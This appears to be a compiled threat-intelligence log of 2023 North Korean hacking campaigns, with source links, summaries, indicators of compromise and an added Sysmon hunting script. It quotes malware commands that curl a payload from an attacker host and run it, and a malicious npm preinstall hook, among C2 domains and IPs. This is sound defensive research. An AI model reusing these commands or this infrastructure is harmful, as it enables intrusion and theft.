  • The discovery of the new Gopuram infections allowed us to attribute the 3CX campaign to the Lazarus threat actor with medium to high confidence. Our attribution is based on the following facts:
  • While investigating an attack on a Southeast Asian cryptocurrency company in 2020, we found Gopuram coexisting on the same machine with the AppleJeus backdoor, which is attributed to Lazarus.
  • The Gopuram backdoor has been observed in attacks on cryptocurrency companies, which is aligned with the interests of the Lazarus threat actor.
  • While looking for additional implants that used the same loader shellcode as the 3CX implants, we discovered a sample on a multiscanner service (MD5: 933508a9832da1150fcfdbc1ca9bc84c) loading a payload that uses the wirexpro[.]com C2 server. The same server is listed as an IoC for an AppleJeus campaign by Malwarebytes. Indicators::

Google TAG: How we’re protecting users from government-backed attacks from North Korea

Date:: 2023-04-05 URL:: https://mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/ https://blog.virustotal.com/2023/04/apt43-investigation-into-north-korean.html Tags:: Details:: Indicators::

Inside the international sting operation to catch North Korean crypto hackers

Date:: 2023-04-11 URL:: https://cnn.com/2023/04/09/politics/north-korean-crypto-hackers-crackdown/index.html Tags:: Details:: Indicators::

Lazarus DeathNote campaign

Date:: 2023-04-12 URL:: https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ Tags:: Operation DreamJob, Applejeus, DeathNote Details::

  • The Trojanized application utilized in the second stage is masquerading as a genuine UltraVNC viewer. If executed without any command line parameters, it will display a legitimate UltraVNC viewer window. However, it carries out a malicious routine when it is spawned with “-s {F9BK1K0A-KQ9B-2PVH-5YKV-IY2JLT37QQCJ}” parameters. The other infection method executes the installer, which creates and registers an injector and backdoor in a Windows service. Finally, the backdoor is injected into a legitimate process (svchost.exe) and initiates a command-and-control (C2) operation. In this infection, the final payload injected into the legitimate process was Manuscrypt. Until this discovery, the Lazarus group had primarily targeted the cryptocurrency business. Our investigation has identified potential compromises of individuals or companies involved in cryptocurrency in Cyprus, the United States, Taiwan and Hong Kong.
  • Finally, this Trojanized PDF viewer overwrites the original opened file with a decoy PDF file and opens it to deceive the victim while implementing the malware payload. The payload is executed with command line parameters, and a shortcut file is created in the Startup folder to ensure persistence. This infection mechanism demonstrates the care and precision with which the actor delivers the payload.
  • SumatraPDF, BLINDINGCAN, COPPERHEDGE, Mimikatz, SecurePDF, ForestTiger Indicators::
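
The rules below are an added example (not code from Kaspersky, Microsoft or any other vendor) that turn two of the TTPs on this page into checks over Sysmon-style telemetry: the DEV-0139 side-load of a planted wsock32.dll by logagent.exe from the drop directory named in the Microsoft DEV-0139 entry above, and the DeathNote behaviours just described, namely the UltraVNC lookalike that only turns malicious when spawned with the `-s {F9BK1K0A-...}` argument, and the PDF viewer writing a shortcut into the Startup folder. Field names follow Sysmon's schema (event IDs 1, 7 and 11); the events, the user name and the benign paths are constructed.

```python
"""Hunting rules for DEV-0139 DLL side-loading and DeathNote trigger/persistence,
run over constructed Sysmon-style events. Added example; not vendor code.
Field names follow Sysmon (EventID 1 ProcessCreate, 7 ImageLoad, 11 FileCreate)."""
import ntpath
import re

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# DeathNote: the trojanized UltraVNC viewer only misbehaves with this argument.
DEATHNOTE_TRIGGER = "-s {F9BK1K0A-KQ9B-2PVH-5YKV-IY2JLT37QQCJ}"
# DEV-0139: logagent.exe side-loads a planted wsock32.dll that proxies the real one.
SIDELOAD_PAIRS = {"logagent.exe": "wsock32.dll"}
STARTUP_RE = re.compile(r"\\microsoft\\windows\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)

def _base(p):
    return ntpath.basename(p).lower()

def _in_system_dir(p):
    return ntpath.dirname(p).lower().rstrip("\\") in SYSTEM_DIRS

def rule_deathnote_vnc(ev):
    if ev["EventID"] == 1 and DEATHNOTE_TRIGGER.lower() in ev["CommandLine"].lower():
        return f"DeathNote UltraVNC trigger argument passed to {ev['Image']}"
    return None

def rule_dll_sideload(ev):
    """A system DLL name loaded by its known sideload host from outside System32."""
    if ev["EventID"] != 7:
        return None
    want = SIDELOAD_PAIRS.get(_base(ev["Image"]))
    loaded = ev["ImageLoaded"]
    if want and _base(loaded) == want and not _in_system_dir(loaded):
        return f"{want} loaded from non-system path {ntpath.dirname(loaded)}"
    return None

def rule_startup_persistence(ev):
    """A non-shell process dropping a .lnk into the per-user Startup folder."""
    if ev["EventID"] != 11 or not STARTUP_RE.search(ev["TargetFilename"]):
        return None
    writer = _base(ev["Image"])
    if writer != "explorer.exe":        # the shell writing a shortcut is the user, not malware
        return f"{writer} wrote Startup shortcut {ntpath.basename(ev['TargetFilename'])}"
    return None

RULES = (rule_deathnote_vnc, rule_dll_sideload, rule_startup_persistence)

def hunt(events):
    """Return (EventID, rule name, message) for every event a rule matches."""
    findings = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                findings.append((ev["EventID"], rule.__name__, msg))
    return findings

# Constructed events: each malicious case is paired with a benign look-alike.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\bob\Downloads\vncviewer.exe",
     "CommandLine": r'"C:\Users\bob\Downloads\vncviewer.exe" -s {F9BK1K0A-KQ9B-2PVH-5YKV-IY2JLT37QQCJ}'},
    {"EventID": 1, "Image": r"C:\Program Files\uvnc\vncviewer.exe",
     "CommandLine": r'"C:\Program Files\uvnc\vncviewer.exe" 10.0.0.5::5900'},
    {"EventID": 7, "Image": r"C:\ProgramData\Microsoft Media\logagent.exe",
     "ImageLoaded": r"C:\ProgramData\Microsoft Media\wsock32.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\logagent.exe",
     "ImageLoaded": r"C:\Windows\System32\wsock32.dll"},
    {"EventID": 11, "Image": r"C:\Users\bob\AppData\Local\Temp\SecurePDF.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notes.lnk"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The side-load rule deliberately keys on the DLL's file name rather than a hash, since the planted wsock32.dll changes per campaign while the technique (a system DLL name resolved from the executable's own directory) does not; the trigger-argument rule is the opposite, a brittle but high-confidence string that is cheap to keep in a watchlist.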

Linux malware strengthens links between Lazarus and the 3CX supply-chain attack

Date:: 2023-04-20 URL:: https://welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/ https://reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ https://crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/ https://blog.checkpoint.com/2023/03/29/3cxdesktop-app-trojanizes-in-a-supply-chain-attack-check-point-customers-remain-protected/ https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack https://trendmicro.com/fr_fr/research/23/c/information-on-attacks-involving-3cx-desktop-app.html https://x.com/patrickwardle/status/1641294247877021696 https://objective-see.org/blog/blog_0x73.html Tags:: 3CX, Applejeus Details::

  • ESET researchers have discovered a new Lazarus Operation DreamJob campaign targeting Linux users. Indicators::
  • journalide.org
  • journalide.org/djour.php

| IP | Domain | Hosting provider | Seen | Details |
|---|---|---|---|---|
| 23.254.211.230 | N/A | Hostwinds LLC. | | BADCALL for Linux |
| 38.108.185.79 | | | | |
| 38.108.185.115 | od.lk | Cogent Communications | 2023-03-16 | Remote OpenDrive storage containing SimplexTea (/d/NTJfMzg4MDE1NzJf/vxmedia) |
| 172.93.201.88 | journalide.org | Nexeon Technologies, Inc. | 2023-03-29 | C&C server for SimplexTea (/djour.php) |

Targeting macOS with 'RustBucket' Malware

Date:: 2023-04-21 URL:: https://jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/ https://securelist.com/bluenoroff-methods-bypass-motw/108383/ Tags:: BlueNoroff, RustBucket Details::

  • Jamf Threat Labs discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. Jamf attributes it to BlueNoroff because of similarities to activity described in a Kaspersky blog. Indicators::

US DOJ: North Korean Foreign Trade Bank Representative Charged in Crypto Laundering Conspiracies

Date:: 2023-04-24 URL:: https://justice.gov/opa/pr/north-korean-foreign-trade-bank-representative-charged-crypto-laundering-conspiracies Tags:: Money Laundering Details::

  • Sim Hyon Sop + Wu Huihu Indicators::
  • 1G3Qj4Y4trA8S64zHFsaD5GtiSwX19qwFv

USG: Half of North Korean missile program funded by cyberattacks and crypto theft

Date:: 2023-05-10 URL:: https://cnn.com/2023/05/10/politics/north-korean-missile-program-cyberattacks/index.html Tags:: Money Laundering Details::

  • It’s an estimate that suggests hacking and cybercrime are key to the North Korean regime’s survival. Neuberger’s comments come amid heightened international concern over Pyongyang’s missile and nuclear weapons program. A new intercontinental ballistic missile that North Korea tested in April could allow the regime to launch long-range nuclear strikes more quickly, CNN previously reported. Indicators::

Attack Trends Related to DangerousPassword

Date:: 2023-05-12 URL:: https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html Tags:: DangerousPassword Details::

  • DangerousPassword, CryptoMimic, SnatchCrypto
  • Attacks by sending malicious CHM files from LinkedIn
  • Attacks using OneNote files
  • Attacks using virtual hard disk files
  • An AppleScript is contained, and it downloads an unauthorized application in main.scpt using the curl command and then executes it Indicators::
  • `do shell script "curl -o /users/shared/1.zip https://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV@p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A curl"`
  • `do shell script "unzip -o -d /users/shared /users/shared/1.zip"`
  • `do shell script "open /users/shared/Internal\\ PDF\\ Viewer.app"`
  • cloud[.]dnx[.]capital

APT-C-28 (ScarCruft) Organization Uses Malicious Documents to Deliver RokRAT Attack Activity Analysis

Date:: 2023-05-19 URL:: https://mp.weixin.qq.com/s/RjvwKH6UBETzUVtXje_bIA Tags:: ScarCruft, ROKRAT Details::

  • APT-C-28, also known as ScarCruft, APT37 (Reaper), and Group123, is an overseas APT organization from Northeast Asia. Its related attack activities can be traced back to 2012 and are still active today. APT-C-28 mainly conducts cyber attacks against Asian countries such as South Korea, targeting multiple industries including chemicals, electronics, manufacturing, aerospace, automobiles, and healthcare, mainly to steal information and sensitive data related to strategic military, political, and economic interests. At the same time, RokRat is a cloud-based remote access tool that has been used by APT-C-28 in multiple attack activities since 2016.
  • The APT-C-28 organization was observed delivering RokRat malware to targets under the guise of malicious documents such as payment application forms. This attack activity is largely consistent with the process disclosed in public threat intelligence in 2021 [1], in which APT-C-28 used VBA self-decoding technology to inject RokRat. In this attack activity, the initial sample we found was a malicious document disguised as a payment application form that induced users to enable macros and then download and execute RokRat malware. However, combined with previous public threat intelligence [2], the initial payload of this attack activity was most likely a phishing email. Indicators::
  • api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhkSUpseW14b21abFd2WW8_ZT15SjJTSkk/root/content

Phishing Attacks Targeting North Korea-Related Personnel

Date:: 2023-05-22 URL:: https://asec.ahnlab.com/en/52970/ Tags:: Kimsuky Details::

  • AhnLab Security Emergency response Center (ASEC) has recently discovered that the Kimsuky group had created a webmail website that looks identical to that of certain national policy research institutes. Earlier this year, ASEC covered similar issues in the posts ‘Web Page Disguised as a Kakao[1]/Naver[2] Login Page’. The previous attacker set up the fake login page with autocompleted IDs of trade, media, and North Korea-related individuals and organizations. Similarly, the recently discovered web page had the ID of the target organization’s leader autocompleted. When the user attempts to log in, the threat actor comes into possession of the internal webmail account credentials. This data is deemed as useful as procuring the credentials of the target user’s portal website account. Indicators::
  • mailid[.]scabm[.]co[.]kr/account/login[.]do

US sanctions orgs behind North Korea’s ‘illicit’ IT worker army

Date:: 2023-05-23 URL:: https://bleepingcomputer.com/news/security/us-sanctions-orgs-behind-north-koreas-illicit-it-worker-army/ Tags:: DPRK-IT Details::

  • The Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions today against four entities and one individual for their involvement in illicit IT worker schemes and cyberattacks generating revenue to finance North Korea's weapons development programs. North Korea's illicit revenue generation strategy relies heavily on a massive army of thousands of IT workers who hide their identities to get hired by companies overseas, the OFAC said in a press release published on Tuesday. To secure employment with targeted companies, they employ various deceptive tactics, including using stolen identities, fake personas, and falsified or forged documentation. Indicators::

Bluenoroff’s RustBucket campaign (SnatchCrypto)

Date:: 2023-05-23 URL:: https://blog.sekoia.io/bluenoroffs-rustbucket-campaign Tags:: BlueNoroff, RustBucket Details::

  • The RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.
  • When opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine-page document about a venture capital company that appears to be the printout of a legitimate company’s website. The fake PDF reader uses a hardcoded 100-byte XOR key to decrypt the new content of the document and the C2 server configuration.
  • During our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the key PDF requiring user interaction.
  • Bluenoroff’s observed initial intrusion vectors include phishing emails as well as social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend.me; further analysis led us to the following LinkedIn profile: Indicators::

North Korea is now Mining Crypto to Launder Its Stolen Loot

Date:: 2023-05-23 URL:: https://web.archive.org/web/20230328150400/https://wired.com/story/north-korea-apt43-crypto-mining-laundering/ Tags:: Kimsuky, APT43 Details::

  • Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
  • Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into hashing services that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity. Indicators::

Kimsuky Strikes Again: New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

Date:: 2023-06-06 URL:: https://sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/ Tags:: Kimsuky Details::

  • Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence. Indicators::

North Korea-Aligned TAG-71 Spoofs Financial Institutions in Asia and US

Date:: 2023-06-07 URL:: https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf Tags:: BlueNoroff Details::

  • We also confirmed that 2 previously identified IP addresses were still in use in this campaign:
  • 155.138.159.45 and 104.255.172.56. 155.138.159.45, identified in a December 2022 Kaspersky report on Bluenoroff activity, overlaps with TAG71 activity. This IP address has been used by TAG71 from August 2022 to February 2023. 25 domains resolved to this IP address; these domains also had generic document sharing and protection themes.
  • 104.255.172.56 was used by TAG71 from September 2022 until March 2023, and domains resolving to this IP address previously resolved to infrastructure associated with TAG71 in a September 2022 report published by Insikt Group to Recorded Future clients. While Insikt Group was unable to determine the nature of every domain, most of the domains in this cluster appear to be spoofing private equity firms in Japan, the United States, and Vietnam. The domains that were live at the time of analysis redirected visitors to the legitimate website they were spoofing.
  • Insikt Group found 2 ZIP files on 104.255.172.56. The ZIP files contained an encrypted PDF document alongside a double-extension file called “Password.txt.lnk”, used to trick the victim into clicking it in order to get the password for the encrypted PDF file; instead it launches either “pcalua.exe” or “mshta.exe”, performing an indirect command execution technique. Indicators::

Report: North Korean Hackers Have Stolen $3 Billion Worth of Crypto

Date:: 2023-06-12 URL:: https://finance.yahoo.com/news/report-north-korean-hackers-stolen-034503145.html Tags:: Money Laundering Details::

  • Over the past five years, hackers backed by North Korea have successfully stolen approximately $3 billion in cryptocurrency by employing sophisticated tactics and posing as recruiters, IT workers, and government officials. These elaborate schemes have allowed them to gain access to sensitive information and exploit unsuspecting victims. Notably, the stolen cryptocurrency funds 50% of North Korea's ballistic missile program, as reported by The Wall Street Journal. Indicators::

Fragments of Cross-Platform Backdoor Hint at Larger Mac OS Attack

Date:: 2023-06-13 URL:: https://bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/ Tags:: JokerSpy, ROT13 Details::

  • During routine detection maintenance, our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing. Two of the three isolated samples are generic backdoors written in Python that seem to target Mac OS, Windows and Linux-based operating systems. Indicators::
  • git-hub[.]me/view.php

Initial research exposing JOKERSPY

Date:: 2023-06-20 URL:: https://elastic.co/security-labs/inital-research-of-jokerspy Tags:: JokerSpy, ROT13 Details::

  • An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.
  • sh.py is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt.
  • While we are still investigating and continuing to gather information, we strongly believe that the initial access for this malware was a malicious or backdoored plugin or third-party dependency that provided the threat actor access. This aligns with the connection made by the researchers at Bitdefender, who correlated the hardcoded domain found in a version of the sh.py backdoor to a tweet about an infected macOS QR code reader which was found to have a malicious dependency. Indicators::
  • app.influmarket[.]org

Sophisticated Ongoing Attack on NPM

Date:: 2023-06-23 URL:: https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/ https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/ Tags:: JumpCloud Details::

  • Two Packages Working Together: The attack chain is spread across a pair of packages, and the order in which these packages are installed is important. The first package fetches a token from one of several potential remote servers and stores it within a subdirectory of the user’s home directory, such as ~/.config/npmcache. The second package then uses this token to acquire another script from the remote server. Given this workflow, each package in a pair must be executed sequentially, in the correct order, and on the same machine for the chain to succeed. Indicators::
  • chart-tablejs
  • sync-request
  • preinstall: npm install sync-request && node main.js
| Stage | Package | Token path | C2 domain | Endpoint |
|---|---|---|---|---|
| 1 | jpeg-metadata | ~/.vscode/jsontoken | npmrepos.com | checkupdate.php |
| 2 | ttf-metadata | ~/.vscode/jsontoken | npmrepos.com | getupdate.php |
| 1 | chart-tablejs | ~/.cprice/pricetoken | tradingprice.net | checktoken.php |
| 2 | vuewjs | ~/.cprice/pricetoken | tradingprice.net | getbprice.php |
| 1 | chart-vxe | ~/.cprice/pricetoken | tradingprice.net | checktoken.php |
| 2 | vue-gws | ~/.cprice/pricetoken | tradingprice.net | getbprice.php |
| 1 | elliptic-helper | ~/.vscode/jsontoken | npmcloudjs.com | checkupdate.php |
| 2 | elliptic-parser | ~/.vscode/jsontoken | npmcloudjs.com | getupdate.php |
| 1 | price-fetch | ~/.cprice/pricetoken | bi2price.com | checktoken.php |
| 2 | price-record | ~/.cprice/pricetoken | bi2price.com | getbprice.php |
| 1 | btc-web3 | ~/.cprice/pricetoken | bi2price.com | checktoken.php |
| 2 | other-web3 | ~/.cprice/pricetoken | bi2price.com | getbprice.php |
| 1 | assets-graph | ~/.cprice/pricetoken | bi2price.com | checktoken.php |
| 2 | assets-table | ~/.cprice/pricetoken | bi2price.com | getbprice.php |
| 1 | tslib-react | ~/.vscode/jsontoken | npmjsregister.com | checkupdate.php |
| 2 | tslib-util | ~/.vscode/jsontoken | npmjsregister.com | getupdate.php |
| 1 | audit-ejs | ~/.npm/audit-cache | npmjsregister.com | auditcheck.php |
| 2 | audit-vue | ~/.npm/audit-cache | npmjsregister.com | getcheckjs.php |
| 1 | ejs-audit | ~/.npm/audit-cache | npmjsregister.com | auditcheck.php |
| 2 | vue-audit | ~/.npm/audit-cache | npmjsregister.com | getcheckjs.php |
| 1 | cache-vue | ~/.config/npmcache | npmjsregister.com | auditcheck.php |
| 2 | cache-react | ~/.config/npmcache | npmjsregister.com | getcheckjs.php |
| 1 | sync-http-api | ~/.config/npmcache | npmjsregister.com | auditcheck.php |
| 2 | sync-https-api | ~/.config/npmcache | npmjsregister.com | getcheckjs.php |
| 1 | couchcache-audit | ~/.audit/npmcache | npmjsregister.com | auditcheck.php |
| 2 | snykaudit-helper | ~/.audit/npmcache | npmjsregister.com | getcheckjs.php |
  • 142.44.178[.]222
  • 5.135.199[.]12
  • 188.68.229[.]49
  • 91.195.240[.]12
  • 216.189.145[.]247

North Korea’s Cyber Strategy

Date:: 2023-06-23 URL:: https://recordedfuture.com/north-koreas-cyber-strategy https://go.recordedfuture.com/hubfs/reports/cta-nk-2023-0622.pdf Tags:: Details:: Indicators::

Silly mistakes and a new malware family

Date:: 2023-06-23 URL:: https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/ https://blog.talosintelligence.com/lazarus-magicrat/ https://asec.ahnlab.com/en/34461/ Tags:: Andariel Details::

  • Andariel, YamaBot, MagicRat, NukeSped, DTrack, EarlyRat
  • Infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the C2 server
  • VBA code pings a server associated with the HolyGhost / Maui ransomware campaign Indicators::

JokerSpy Unknown Adversary Targeting Organizations with Multi-Stage macOS Malware

Date:: 2023-06-28 URL:: https://sentinelone.com/blog/jokerspy-unknown-adversary-targeting-organizations-with-multi-stage-macos-malware/ Tags:: JokerSpy, ROT13 Details::

  • In the intrusions seen to date, researchers identified two Python backdoors, shared.dat and sh.py. The former uses a simple rot13 string obfuscation technique.
  • The sh.py backdoor is also multi-platform and requires a separate configuration file stored at ~/Public/Safari/sar.dat, likely containing the C2 as well as other parameters. The C2 observed by Elastic in an attack on an unnamed Japanese cryptocurrency exchange was app.influmarket.org. Indicators::
  • 45.76.238[.]53 - The Constant Company, LLC, Dallas TX, Vultr Holdings, LLC, REMOTE_DESKTOP
  • 45.77.123[.]18
  • www.git-hub[.]me
  • app.influmarket[.]org

How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

Date:: 2023-07-05 URL:: https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/ Tags:: BlueNoroff, RustBucket Details::

  • BlueNoroff
  • RustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages of the malware.
  • The attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled AppleScript that is saved in a .app format. Unlike regular macOS applications, Applets typically lack a user interface and function merely as a convenient way for developers to distribute AppleScripts to users.
  • The threat actors chose not to save the script as run-only, which allows us to easily decompile the script with the built-in osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when viewing compiled scripts).
  • The script contains three do shell script commands, which serve to download and execute the next stage. In the variant described by JAMF, this was a barebones PDF viewer called Internal PDF Viewer. We will forgo the details here as researchers have previously described this in detail.
  • We have found a number of different Stage 2 payloads, some written in Swift, some in Objective-C, and both compiled for Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of the Stage 2 samples vary. The universal ‘fat’ binaries vary between 160Kb and 210Kb.
  • Both variants are Mach-O universal binaries compiled from Rust source code. Variant A is considerably larger than B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The slimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both. Notably, variant B does away with the webT class seen in variant A for gathering environmental information and checking for execution in a virtual machine via querying the SPHardwareDataType value of system_profiler.
  • Importantly, variant B contains a persistence mechanism that was not present in the earlier versions of RustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at ~/Library/LaunchAgents/com.apple.systemupdate.plist. The ErrorCheck file also writes a copy of itself to ~/Library/Metadata/System Update and serves as the target executable of the LaunchAgent. Indicators::

Flori Ventures Detected

Date:: 2023-07-08 URL:: https://x.com/TLP_R3D/status/1677617586349981696 Tags:: Bluenoroff, TA444 Details::

  • Fresh activity from TA444 noted! New trails found around the #FloriVentures theme Indicators::
  • 192.119.64[.]43
  • floriventuresfinance.linkpc[.]net
  • floriventuresfund.linkpc[.]net
  • floriventurescapital.linkpc[.]net

Possible #Bluenoroff #TA444 #APT38 activity

Date:: 2023-07-10 URL:: https://x.com/KSeznec/status/1678319188140539904 Tags:: Bluenoroff, TA444 Details::

  • Possible #Bluenoroff #TA444 #APT38 activity Indicators::

The DPRK strikes using a new variant of RUSTBUCKET

Date:: 2023-07-13 URL:: https://elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket Tags:: BlueNoroff, DangerousPassword, SquidSquad, RustBucket Details::

Github: Security alert: social engineering campaign targets technology industry employees

Date:: 2023-07-18 URL:: https://github.blog/security/vulnerability-research/security-alert-social-engineering-campaign-targets-technology-industry-employees/ Tags:: Details::

  • Jade Sleet impersonates a developer or recruiter by creating one or more fake persona accounts on GitHub and other social media providers. Thus far, we have identified fake personas that operated on LinkedIn, Slack, and Telegram. Indicators::
  • npm packages:: assets-graph assets-table audit-ejs audit-vue binance-prices coingecko-prices btc-web3 cache-react cache-vue chart-tablejs chart-vxe couchcache-audit ejs-audit elliptic-helper elliptic-parser eth-api-node jpeg-metadata other-web3 price-fetch price-record snykaudit-helper sync-http-api sync-https-api tslib-react tslib-util ttf-metadata vue-audit vue-gws vuewjs
  • gitHub accounts:: GalaxyStarTeam Cryptowares Cryptoinnowise netgolden
  • npm accounts:: charlestom2023 eflodzumibreathbn galaxystardev garik.khasmatulin.76 hydsapprokoennl leimudkegoraie3 leshakov-mikhail linglidekili9g mashulya.bakhromkina mayvilkushiot outmentsurehauw3 paupadanberk pormokaiprevdz podomarev.goga teticseidiff51 toimanswotsuphous ufbejishisol

DangerousPassword attacks targeting developers’ Windows, macOS, and Linux environments

Date:: 2023-07-19 URL:: https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html Tags:: DangerousPassword, ROT13 Details::

  • At the end of May 2023, JPCERT/CC confirmed an attack targeting developers of cryptocurrency exchange businesses, and it is considered to be related to the targeted attack group DangerousPassword [1], [2] (a.k.a. CryptoMimic or SnatchCrypto), which has been continuously attacking since June 2019. This attack targeted Windows, macOS, and Linux environments with Python and Node.js installed on the machine. This article explains the attack that JPCERT/CC has confirmed and the malware used.
  • The Python malware is a simple downloader-type malware that downloads and executes MSI files from an external source. As shown in Figure 2, it is characterized by its extensive use of ROT13 to obfuscate the C2 strings and other strings it uses. Indicators::
  • app.developcore[.]org
  • pkginstall[.]net
  • www.git-hub[.]me
  • checkdevinc[.]com

JumpCloud: Attacker Infrastructure Links Compromise to North Korean APT Activity

Date:: 2023-07-20 URL:: https://sentinelone.com/labs/jumpcloud-intrusion-attacker-infrastructure-links-compromise-to-north-korean-apt-activity/ https://jumpcloud.com/support/july-2023-iocs Tags:: JumpCloud Details::

  • While the following is not a strong indicator of attribution alone, it’s noteworthy that specific patterns in how the domains are constructed and used follow a similar pattern to other DPRK linked campaigns we track. Indicators with suspected actor association, but unverified as of this writing, include junknomad[.]com and insatageram[.]com (registered with jeanettar671belden[@]protonmail[.]com).
  • Additional pivots of potential interest can be made through other IPs, including 167.114.188[.]40, and to a variety of low confidence attacker-associated infrastructure.
  • Following the profile of the associated infrastructure from both the JumpCloud intrusion and the GitHub security alert, we can expand to further associated threat activity. For example, we can see clear links to other NPM and “package” themed infrastructure we associate with high to medium confidence, as noted in the list below. This list further expands thanks to the findings and blog from Phylum in late June. Indicators::

Mandiant: North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack (JumpCloud)

Date:: 2023-07-24 URL:: https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/ Tags:: TraderTraitor Details::

  • UNC4899, TraderTraitor, ExpressVPN, JumpCloud, Trading Technologies, X_TRADER, 3CX Indicators::

DPRK Sanctions Timeline

Date:: 2023-07-24 URL:: https://nkhumanitarian.wordpress.com/dprk-sanctions-timeline/ Tags:: Details::

  • It describes the first generation as consisting of the so-called smart sanctions targeting the military and the elite, based on resolutions 1718 (2006), 1874 (2009), 2087 (2013), 2094 (2013), and 2270 (2016).
  • But after the September 9, 2016, detonation of the DPRK’s most powerful nuclear weapon at the time, the nature of UN sanctions against the DPRK changed, the report notes. It gave rise to the second generation ‘sectoral’ sanctions targeting entire spans of the North Korean economy, based on resolutions 2321 (2016), 2371 (2017), 2375 (2017), and 2397 (2017).
  • The first generation sanctions had mostly lengthened the list of embargoed arms and the list of dual-use goods and technology. Each new resolution of that generation also added more entities and officials connected with the DPRK who are targeted with financial sanctions and travel bans. They also targeted the elite by banning the import of ‘luxury goods’, an ill-defined category of items whose sanctioning has been comprehensively and demonstrably evaded.
  • The Human Costs report observes that “these [first generation] sanctions may affect the non-elite population, as the military ban includes items, materials, and technologies that could be used for either military or civilian purposes (‘dual-use’), and the DPRK has been progressively cut off from international capital.”
